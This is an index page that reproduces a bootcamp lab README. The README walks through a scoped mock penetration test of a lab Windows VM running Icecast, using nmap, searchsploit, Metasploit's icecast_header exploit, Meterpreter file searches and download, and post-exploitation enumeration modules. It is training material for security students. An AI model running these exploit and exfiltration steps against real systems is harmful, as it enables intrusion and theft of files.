Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/oflore12/penetration-test-engagement
Play the role of an independent penetration tester hired by GoodCorp Inc. to perform security tests against their CEO’s workstation.
https://github.com/oflore12/penetration-test-engagement
exploit hacking penetration-testing pentesting
Last synced: 3 days ago
JSON representation
Play the role of an independent penetration tester hired by GoodCorp Inc. to perform security tests against their CEO’s workstation.
- Host: GitHub
- URL: https://github.com/oflore12/penetration-test-engagement
- Owner: oflore12
- Created: 2021-07-03T20:21:21.000Z (over 3 years ago)
- Default Branch: main
- Last Pushed: 2024-07-24T18:23:44.000Z (4 months ago)
- Last Synced: 2024-07-24T20:49:44.200Z (4 months ago)
- Topics: exploit, hacking, penetration-testing, pentesting
- Homepage:
- Size: 3.19 MB
- Stars: 0
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# Penetration-Test-Engagement
This activity allowed me to play the role of an independent penetration tester hired by GoodCorp Inc. to perform security tests against their CEO’s workstation.
- The CEO claims to have passwords that are long and complex and therefore unhackable.
- I was tasked with gaining access to the CEO's computer and using a Meterpreter session to search for two files that contain the strings `recipe` and `seceretfile`.
- The deliverable for this engagement will be in the form of a report labeled `Report.docx`.
#### Setup
- To begin, start the Icecast server to emulate the CEO's computer.
- Then log onto the DVW10 machine and wait for the Icecast application to popup.
- Then click `Start Server`.
#### Scope
- The scope of this engagement is limited to the CEO's workstation only. You are not permitted to scan any other IP addresses or exploit anything other than the CEO's IP address.
- The CEO has a busy schedule and cannot have the computer offline for an extended period of time. Therefore, denial of service and brute force attacks are prohibited.
- After you gain access to the CEO’s computer, you may read and access any file, but you cannot delete them. Nor are you allowed to make any configurations changes to the computer.
- Since you've already been provided access to the network, OSINT won't be necessary.
#### Lab Environment
- Attacking machine: `Kali Linux`
- Target machine: `DVW10`
#### Deliverable
- [Report.docx]( Report.docx)
### Instructions
You've been provided full access to the network and are getting ping responses from the CEO’s workstation.
1. Perform a service and version scan using Nmap to determine which services are up and running:
nmap -sV 192.168.0.20
2. From the previous step, we see that the Icecast service is running. Let's start by attacking that service. Search for any Icecast exploits:
searchsploit icecast
3. Now that we know which exploits are available to us, let's start Metasploit:
msfconsole
4. Search for the Icecast module and load it for use.
search icecast
use exploit/windows/http/icecast_header
5. Set the `RHOST` to the target machine.
set RHOSTS 192.168.0.20
6. Run the Icecast exploit.
run
search –f \*secretfile\*
7. You should now have a Meterpreter session open.
search –f \*recipe\*
**Bonus**: Run the command that exfiltrates the `recipe*.txt` file:
download ‘c:\Users\IEUser\Documents\Drinks.recipe.txt’
8. You can also use Meterpreter's local exploit suggester to find possible exploits.
run post/multi/recon/local_exploit_suggester
#### Bonus
- Run a Meterpreter post script that enumerates all logged on users.
run post/windows/gather/enum_logged_on_users
- Open a Meterpreter shell and gather system information for the target.
shell
ipconfig –all
- Run the command that displays the target's computer system information:
systeminfo
---
© 2020 Trilogy Education Services, a 2U Inc Brand. All Rights Reserved.